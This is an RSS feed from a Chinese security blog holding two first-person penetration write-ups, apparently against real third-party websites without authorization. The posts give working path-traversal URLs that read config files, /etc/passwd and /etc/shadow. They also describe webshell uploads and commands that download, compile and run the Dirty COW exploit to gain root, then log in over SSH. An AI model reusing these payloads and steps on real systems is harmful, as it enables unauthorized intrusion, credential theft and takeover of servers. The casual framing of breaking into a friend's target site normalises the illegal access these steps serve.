<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>脏牛 &#8211; ChaBug安全</title>
	<atom:link href="/tags/%E8%84%8F%E7%89%9B/feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>一个分享知识、结识伙伴、资源共享的博客</description>
	<lastBuildDate>Fri, 23 Aug 2019 01:17:24 +0000</lastBuildDate>
	<language>zh-CN</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.5.5</generator>
	<item>
		<title>记一次渗透之从后台到提权</title>
		<link>/web/650.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Sat, 06 Jul 2019 17:16:28 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[getshell]]></category>
		<category><![CDATA[实战]]></category>
		<category><![CDATA[脏牛]]></category>
		<guid isPermaLink="false">/?p=650</guid>

					<description><![CDATA[某日朋友发来一个站让搞！搞搞搞！ 国外站，翻译的我尴尬证都犯了。 习惯性先发文章看看编辑器上传附件什么的。 四处上传，首先尝试编辑器处上传图片，经验告诉我越low的编辑器越好拿sh...]]></description>
										<content:encoded><![CDATA[<p>某日朋友发来一个站让搞！搞搞搞！</p>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87b100e1fad.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87b100e1fad.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<p>国外站，翻译的我尴尬证都犯了。</p>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87b1d0d5aec.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87b1d0d5aec.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<p>习惯性先发文章看看编辑器上传附件什么的。</p>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87b276a91c7.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87b276a91c7.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<p>四处上传，首先尝试编辑器处上传图片，经验告诉我越low的编辑器越好拿shell。</p>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87b30665201.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87b30665201.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<p>我错了，白名单+上传重命名，smarteditor编辑器，各种截断尝试，突破不了。</p>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87b48334775.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87b48334775.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87b40e1397e.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87b40e1397e.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<p>这编辑器无敌。随后发现另外三处均是调用此编辑器上传，暂时换思路。</p>
<p>在已经发布的文章中发现绝对路径</p>
<div class="highlight">
<div class="chroma ">
<div id="crayon-5d1ed033533ff463407921" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main">
<table class="crayon-table">
<tbody>
<tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content">
<div class="crayon-num" data-line="crayon-5d1ed033533ff463407921-1">1</div>
</div>
</td>
<td class="crayon-code">
<div class="crayon-pre">
<div id="crayon-5d1ed033533ff463407921-1" class="crayon-line"><span class="crayon-v">http</span><span class="crayon-o">:</span><span class="crayon-c">//xxx.com/download.php?dnfile=20190228_012000_0978115.jpg&amp;file=/home/xxx/webapp/../public_html/upload_dir/board/16887879979878fa23f2.jpg</span></div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87b5d84fcc7.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87b5d84fcc7.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<p>测试后发现<code>public_html</code>为根目录，决定挖挖注入，万一是root没降权就舒服了。</p>
<div id="crayon-5d1ed03353407733127003" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main">
<table class="crayon-table">
<tbody>
<tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content">
<div class="crayon-num" data-line="crayon-5d1ed03353407733127003-1">1</div>
</div>
</td>
<td class="crayon-code">
<div class="crayon-pre">
<div id="crayon-5d1ed03353407733127003-1" class="crayon-line"><span class="crayon-v">http</span><span class="crayon-o">:</span><span class="crayon-c">//www.xxx.com/?module=xx&amp;action=xx&amp;iPopNo=1&amp;seq_cd=1</span></div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<p>&nbsp;</p>
<p>经过手动加sqlmap测试，发现后台存在时间盲注，由于国外站点访问不稳定的原因，遂放弃，在后期<a class="tag_link" title="浏览关于“getshell”的文章" href="/tags/getshell" target="_blank" rel="noopener noreferrer">getshell</a>之后发现用户不是<code>root</code>并且权限死得很，为之庆幸并没有在此处浪费时间。</p>
<p>到此处思路死了。编辑器<span class="wpcom_tag_link"><a href="/tags/getshell" title="getshell" target="_blank">getshell</a></span>无解，sql注入getshell卒。还有什么思路呢？</p>
<p>我们之前爆出绝对路径的url访问后发现会自动下载</p>
<div class="highlight">
<div class="chroma ">
<div id="crayon-5d1ed03353409889785611" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main">
<table class="crayon-table">
<tbody>
<tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content">
<div class="crayon-num" data-line="crayon-5d1ed03353409889785611-1">1</div>
</div>
</td>
<td class="crayon-code">
<div class="crayon-pre">
<div id="crayon-5d1ed03353409889785611-1" class="crayon-line"><span class="crayon-v">http</span><span class="crayon-o">:</span><span class="crayon-c">//xxx.com/download.php?dnfile=20190228_012000_0978115.jpg&amp;file=/home/xxx/webapp/../public_html/upload_dir/board/16887879979878fa23f2.jpg</span></div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<p>存在任意文件下载吗？先构造一下尝试</p>
<div class="highlight">
<div class="chroma ">
<div id="crayon-5d1ed0335340b534137264" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main">
<table class="crayon-table">
<tbody>
<tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content">
<div class="crayon-num" data-line="crayon-5d1ed0335340b534137264-1">1</div>
</div>
</td>
<td class="crayon-code">
<div class="crayon-pre">
<div id="crayon-5d1ed0335340b534137264-1" class="crayon-line"><span class="crayon-v">http</span><span class="crayon-o">:</span><span class="crayon-c">//xxx.com/download.php?dnfile=download.php&amp;file=/home/xxx/webapp/../public_html/download.php</span></div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87b7f087df9.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87b7f087df9.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<p>bingo！</p>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87b83626a7e.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87b83626a7e.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<p>存在任意文件下载，我们找下数据库配置文件</p>
<div class="highlight">
<div class="chroma ">
<div id="crayon-5d1ed0335340c650853694" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main">
<table class="crayon-table">
<tbody>
<tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content">
<div class="crayon-num" data-line="crayon-5d1ed0335340c650853694-1">1</div>
</div>
</td>
<td class="crayon-code">
<div class="crayon-pre">
<div id="crayon-5d1ed0335340c650853694-1" class="crayon-line"><span class="crayon-v">http</span><span class="crayon-o">:</span><span class="crayon-c">//xxx.com/download.php?dnfile=config.php&amp;file=/home/xxx/webapp/../public_html/index.php</span></div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<p>index.php一般会引入数据库的config.php</p>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87b8d0690c3.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87b8d0690c3.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<p>重新构造</p>
<div class="highlight">
<div class="chroma ">
<div id="crayon-5d1ed0335340e680146139" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main">
<table class="crayon-table">
<tbody>
<tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content">
<div class="crayon-num" data-line="crayon-5d1ed0335340e680146139-1">1</div>
</div>
</td>
<td class="crayon-code">
<div class="crayon-pre">
<div id="crayon-5d1ed0335340e680146139-1" class="crayon-line"><span class="crayon-v">http</span><span class="crayon-o">:</span><span class="crayon-c">//www.xxx.com/download.php?dnfile=config.php&amp;file=/home/xxx/webapp/../public_html/../webapp/config.php</span></div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87b93038ab1.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87b93038ab1.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<p>数据库配置get！后发现没开3306外链，思路断掉。</p>
<p>在这个时候我重新回头看这个任意文件下载，读一下敏感文件试试？</p>
<div class="highlight">
<div class="chroma ">my.cnf</div>
</div>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87b9cfa15ed.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87b9cfa15ed.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<p>password被注释掉，无用。</p>
<div class="highlight">
<div class="chroma language-bash">
<div id="crayon-5d1ed03353412352985698" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main">
<table class="crayon-table">
<tbody>
<tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content">
<div class="crayon-num" data-line="crayon-5d1ed03353412352985698-1">1</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5d1ed03353412352985698-2">2</div>
<div class="crayon-num" data-line="crayon-5d1ed03353412352985698-3">3</div>
</div>
</td>
<td class="crayon-code">
<div class="crayon-pre">
<div id="crayon-5d1ed03353412352985698-1" class="crayon-line"><span class="crayon-o">/</span><span class="crayon-v">etc</span><span class="crayon-o">/</span><span class="crayon-v">passwd</span></div>
<div id="crayon-5d1ed03353412352985698-2" class="crayon-line crayon-striped-line"><span class="crayon-o">/</span><span class="crayon-v">etc</span><span class="crayon-o">/</span><span class="crayon-v">shadow</span></div>
<div id="crayon-5d1ed03353412352985698-3" class="crayon-line"><span class="crayon-o">/</span><span class="crayon-v">etc</span><span class="crayon-o">/</span><span class="crayon-v">profile</span></div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87bbc2bccfd.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87bbc2bccfd.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87bb24e3ecb.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87bb24e3ecb.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<p>没发现有可用信息。</p>
<p>下载apache配置文件</p>
<div class="highlight">
<div class="chroma ">
<div id="crayon-5d1ed03353413046836516" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main">
<table class="crayon-table">
<tbody>
<tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content">
<div class="crayon-num" data-line="crayon-5d1ed03353413046836516-1">1</div>
</div>
</td>
<td class="crayon-code">
<div class="crayon-pre">
<div id="crayon-5d1ed03353413046836516-1" class="crayon-line"><span class="crayon-v">http</span><span class="crayon-o">:</span><span class="crayon-c">//www.xxx.com/download.php?dnfile=1.php&amp;file=/usr/local/apache/conf/httpd.conf</span></div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87bc74dca1b.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87bc74dca1b.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<p>惊了！html可以被当作php文件！</p>
<p>于是我去编辑器中尝试上传这几种文件，仍以失败告终。</p>
<p>但是附件的我们还没试！</p>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87bd536fb44.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87bd536fb44.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<p>抓包改后缀，返回文章查看路径</p>
<div class="highlight">
<div class="chroma ">
<div id="crayon-5d1ed03353415250991749" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main">
<table class="crayon-table">
<tbody>
<tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content">
<div class="crayon-num" data-line="crayon-5d1ed03353415250991749-1">1</div>
</div>
</td>
<td class="crayon-code">
<div class="crayon-pre">
<div id="crayon-5d1ed03353415250991749-1" class="crayon-line"><span class="crayon-v">http</span><span class="crayon-o">:</span><span class="crayon-c">//www.xxx.com/download.php?dnfile=php.jpg.html&amp;file=/home/xxx/webapp/../public_html/upload_dir/board/13303476456487546a3cd.html</span></div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<p>拼接</p>
<div class="highlight">
<div class="chroma ">
<div id="crayon-5d1ed03353417950859730" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main">
<table class="crayon-table">
<tbody>
<tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content">
<div class="crayon-num" data-line="crayon-5d1ed03353417950859730-1">1</div>
</div>
</td>
<td class="crayon-code">
<div class="crayon-pre">
<div id="crayon-5d1ed03353417950859730-1" class="crayon-line"><span class="crayon-v">http</span><span class="crayon-o">:</span><span class="crayon-c">//www.xxx.com/upload_dir/board/13303476456487546a3cd.html</span></div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87bdf9285ac.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87bdf9285ac.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<p>getshell!</p>
<p>后面的就不说了，提权就是<a class="tag_link" title="浏览关于“脏牛”的文章" href="/tags/%e8%84%8f%e7%89%9b" target="_blank" rel="noopener noreferrer">脏牛</a>+<a href="https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD" target="_blank" rel="nofollow noopener noreferrer">bypass disablefunc</a>一条龙，没啥亮点。</p>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87bf81230af.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87bf81230af.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<p>本章结束，寡人欲休。</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>莫名其妙的后台拿shell加上Linux提权</title>
		<link>/web/352.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Sun, 11 Feb 2018 06:50:00 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[getshell]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[实战]]></category>
		<category><![CDATA[提权]]></category>
		<category><![CDATA[渗透]]></category>
		<category><![CDATA[脏牛]]></category>
		<guid isPermaLink="false">/?p=189</guid>

					<description><![CDATA[当我还在被窝的时候，我们的@X1r0z大佬就已经在日站了。。 或许这就是大佬吧。 大佬召唤，我不得不起床。进入后台，寻找上传点，卧槽，发现FCK编辑器哎我们的XZ大佬现在连FCK编...]]></description>
										<content:encoded><![CDATA[<p>当我还在被窝的时候，我们的<a href="https://exp10it.cn/">@X1r0z大佬</a>就已经在日站了。。</p>
<p><img src="/wp-content/uploads/2018/02/433466645.png" alt="1.png" title="1.png"><br />或许这就是大佬吧。</p>
<p>大佬召唤，我不得不起床。<br />进入后台，寻找上传点，卧槽，发现FCK编辑器哎<br /><img src="/wp-content/uploads/2018/02/2345141013.png" alt="2.png" title="2.png"><br />我们的XZ大佬现在连FCK编辑器都拿不下来了吗？那就到我装逼的时候了！<br />然后GG，点击上传图片竟然。。<br /><img src="/wp-content/uploads/2018/02/2718947025.png" alt="5.png" title="5.png"></p>
<p>怪不得，大佬可是给我扔了个黑锅啊。不过还好，旁边还有一个<code>小文件上传</code>，是个上传点。<br /><img src="/wp-content/uploads/2018/02/2580867573.png" alt="3.png" title="3.png"><br />可是看到这个布局我突然有一种不详的预感。管他呢，burp一顿怼之后，草草放弃了。<br />因为不管怎么改文件名怎么截断都不解析啊。算了，再翻翻其他的。<br /><img src="/wp-content/uploads/2018/02/2360087802.png" alt="4.png" title="4.png"><br />这个语言包管理直觉是能够利用，不过可能还要百度源代码审计，想想放弃了，毕竟人家还是小白呢。</p>
<p>继续翻，我就不信了，发现又一个上传点！<br /><img src="/wp-content/uploads/2018/02/2933152389.png" alt="6.png" title="6.png"><br />好熟悉啊，和刚才发布文章的页面一毛一样！竟然在这有上传点。</p>
<p>那就开怼把！点击<code>插入图片</code>之后是这个样子<br /><img src="/wp-content/uploads/2018/02/270342418.png" alt="7.png" title="7.png"><br />很草率啊，不知道能不能上传。先上传一张正常的试试<br /><img src="/wp-content/uploads/2018/02/4069183061.png" alt="8.png" title="8.png"><br />竟然ok？！那就再试试直接传php后缀的<br /><img src="/wp-content/uploads/2018/02/3078760086.png" alt="9.png" title="9.png"><br />也上传成功了，但是没有返回路径？？？不急，我记得有一个文件管理。<br /><img src="/wp-content/uploads/2018/02/3185685965.png" alt="10.png" title="10.png"><br />果然ojbk了。<br /><img src="/wp-content/uploads/2018/02/1388588561.png" alt="11.png" title="11.png"><br />有没有很佩服我优秀的打码呢？<br />虚拟终端</p>
<pre><code>[*] 基本信息 [     Linux xxx 2.6.18-308.el5 #1 SMP Tue Feb 21 20:06:06 EST 2012 x86_64(xxx) ]
[/wwwroot/upfiles/201802/11/]$ whoami
damachuli
[/wwwroot/upfiles/201802/11/]$ uname -a
Linux xxx 2.6.18-308.el5 #1 SMP Tue Feb 21 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
</code></pre>
<p>竟然是<span class="wpcom_tag_link"><a href="/tags/linux" title="Linux" target="_blank">Linux</a></span>机器，2012年的，我们可以试试<span class="wpcom_tag_link"><a href="/tags/%e8%84%8f%e7%89%9b" title="脏牛" target="_blank">脏牛</a></span><a href="/archives/48.html">详情看这里</a></p>
<pre><code>下载
wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c
编译
gcc -pthread dirty.c -o dirty -lcrypt
运行
./dirty 123456</code></pre>
<p>然后尝试链接提示</p>
<pre><code>fuzz@DESKTOP-JJAMRAA:~$ ssh root@114.80.xxx.xxx
ssh: connect to host 114.80.xxx.xxx port 22: Connection refused</code></pre>
<p><code>netstat -ntpl</code>查看端口<br /><img src="/wp-content/uploads/2018/02/535194959.png" alt="13.png" title="13.png"><br />尝试后发现是55022<br />链接<br /><img src="/wp-content/uploads/2018/02/3956331579.png" alt="13.png" title="13.png"></p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
